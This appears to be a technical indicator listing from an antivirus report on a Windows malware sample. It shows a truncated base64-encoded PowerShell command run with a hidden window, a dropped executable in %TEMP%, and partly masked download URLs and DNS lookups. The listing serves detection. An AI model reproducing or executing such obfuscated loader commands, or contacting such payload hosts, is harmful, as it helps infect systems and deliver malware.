Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADkAcQBzAGIAcgBrAD0AJwBYAF8AeABmAHYAMwBrACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAGAAVQBSAEkAYABUAHkAcABgAFIAYABPAHQATwBjAE8ATAAiACAAPQAgAC...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %TEMP%\x5cqpizh.exe
- %TEMP%\x5cqpizh.exe
- http://ee##n.com/con7ext_sym404/agbx_a2n7_pmie9uf/
- http://el###johan.ir/cgi-bin/9zl_ji8bw_zdhad1j52/
- http://cr##fc.com/wp-admin/gmdmq_9w8l_ek/
- http://mj###.com.ua/wp-content/wr_pgu_kqegor6f/
- DNS ASK ee##n.com
- DNS ASK el###johan.ir
- DNS ASK ha###mobile.vn
- DNS ASK cr##fc.com
- DNS ASK mj###.com.ua
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADkAcQBzAGIAcgBrAD0AJwBYAF8AeABmAHYAMwBrACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAGAAVQBSAEkAYABUAHkAcABgAFIAYABPAHQATwBjAE8ATAAiACAAPQAgAC...' (со скрытым окном)